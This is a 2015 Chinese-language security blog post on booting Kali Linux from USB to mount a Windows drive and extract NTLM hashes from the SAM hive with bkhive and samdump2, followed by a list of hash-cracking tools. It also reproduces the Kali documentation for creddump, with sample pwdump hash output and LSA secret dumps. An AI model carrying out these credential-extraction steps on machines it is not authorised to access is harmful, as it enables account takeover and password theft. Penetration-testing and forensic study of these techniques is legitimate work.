利用kali 提取windows系统 SAM 中hash

作者: admin 分类: 网络安全基础 发布时间: 2015-09-21 00:14

首先u盘 kali 进去

fdisk -l 查看磁盘分区列表
mount -t ntfs /dev/sda1 /mnt 以ntfs磁盘格式 挂载windows系统所在磁盘分区
pc2.ht8

df -k 磁盘分区使用情况
1、windows磁盘
2、挂载点
2

cd /mnt 进入挂载点
ls 查看内容
cd WINDOWS/system32/config 进入SAM所在目录

3

使用 bkhive 和 samdump2

ls
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt 得到ntlmhash

4

5

个人常用破解ntlm hash 加密 常用工具
1、 ophcrack 利用彩虹表跑 ntlm hash 效率极高
2、 hashcat 利用CPU+GPU 跑各种hash (暴力 或加载个人字典)
3、 passwordpro 同hashcat 不过不支持 GPU 使用方便 读取字典速度快 支持 加密多
4、 John the Ripper 新版支持gpu 使用简单

工具不在多 好用就行
下载工具尽量在官网 或原作者blog下载

===========================================================================

creddump Package Description

creddump is a python tool to extract various credentials and secrets from Windows registry hives. It currently extracts:

  • LM and NT hashes (SYSKEY protected)
  • Cached domain passwords
  • LSA secrets

It essentially performs all the functions that bkhive/samdump2, cachedump, and lsadump2 do, but in a platform-independent way.

It is also the first tool that does all of these things in an offline way (actually, Cain & Abel does, but is not open source and is only available on Windows).

Source: https://code.google.com/p/creddump/

creddump Homepage | Kali creddump Repo

  • Author: Brendan Dolan-Gavitt
  • License: GPLv3

Tools included in the creddump package

cachedump – Dump cached credentials
root@kali:~# cachedump
usage: /usr/bin/cachedump <system hive> <security hive>

lsadump – Dump LSA secrets

root@kali:~# lsadump
usage: /usr/bin/lsadump <system hive> <security hive>

pwdump – Dump password hashes

root@kali:~# pwdump
usage: /usr/bin/pwdump <system hive> <SAM hive>

pwdump Usage Example

Dump the password hashes using the system (system) and sam (sam) hives:

root@kali:~# pwdump system sam
Administrator:500:41aa818b512a8c0e72381e4c174e281b:1896d0a309184775f67c14d14b5c365a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:667d6c58d451dbf236ae37ab1de3b9f7:af733642ab69e156ba0c219d3bbc3c83:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8dffa305e2bee837f279c2c0b082affb:::

lsadump Usage Example

Dump the LSA secrets using the system (system) and security (security) hives:

root@kali:~# lsadump system security
_SC_ALG

_SC_Dnscache

_SC_upnphost

20ed87e2-3b82-4114-81f9-5e219ed4c481-SALEMHELPACCOUNT

_SC_WebClient

_SC_RpcLocator

0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantSID
0000   01 05 00 00 00 00 00 05 15 00 00 00 B6 44 E4 23    ………….D.#
0010   F4 50 BA 74 07 E5 3B 2B E8 03 00 00                .P.t..;+….

0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantAccount
0000   00 38 00 48 00 6F 00 31 00 49 45 00 4A 00 26 00    E.J.&.8.H.o.1.I.
0010   00 63 00 72 00 48 00 68 00 53 6B 00 00 00          h.S.c.r.H.k…

_SC_MSDTC

_SC_SSDPSRV

_SC_Alerter

_SC_RpcSs

_SC_LmHosts

_SC_BthServ

发表评论

标签云